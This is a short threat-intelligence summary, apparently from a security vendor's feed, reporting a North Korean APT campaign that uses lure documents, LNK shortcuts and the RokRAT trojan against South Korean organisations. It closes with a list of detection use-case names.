South Korean Industries Under Attack by North Korean APT

  |  Source: 
Think Tanks

South Korean Industries Under Attack by North Korean APT

Category: Threat Actor Activity | Industries: Civil, Communication, Education, Energy, Government, Manufacturing, Think Tanks | Source: IBM

The North Korean APT group ITG10 has been identified to be conducting a large-scale cyber campaign targeting various South Korean entities. According to a report from IBM's Security X-Force, the campaign is targeting organizations in sectors such as communication, education, energy, government, manufacturing, supply chain, think tanks and dissident groups. ITG10 shares similarities in tactics, techniques, and procedures with APT37 (aka. ScarCruft, Richochet Chollima) leading to the assessment of overlap between these threat groups. As part of their attack strategy, ITG10 is utilizing malicious lure documents to distribute malware, including a remote access trojan named RokRAT. Lure documents distributed from ITG10 have touched on subjects associated with geopolitical news or the coverage of such news, media production for broadcasts, document proposals, and an agenda for a multi-group seminar.

The decoy documents have been found to be delivered within a zip file or ISO container file also containing a shortcut/LNK file to initiate the execution of a PowerShell script opening the decoy document to distract the victim whilst the download of the RokRAT occurs in the background. Another batch of potentially related malware was encountered by X-Force, pertaining to three distinct LNK files being used to drop a VBS file as opposed to a usual batch script payload. Unfortunately, the final payload could not be retrieved leaving the malware capabilities unknown and their association to ITG10 or further establishing a link with APT37. "IBM X-Force assesses with high confidence that individuals and organizations holding strategic, political, or military information in connection with the Korean peninsula will see elevated threats from the DPRK, given ITG10’s previous and recent activity."

Anvilogic Scenario:

  • Malicious File Delivering Malware

Anvilogic Use Cases:

  • Compressed File Execution
  • Command Line .cmd Execution
  • Executable Create Script Process

Get trending threats published weekly by the Anvilogic team.

Sign Up Now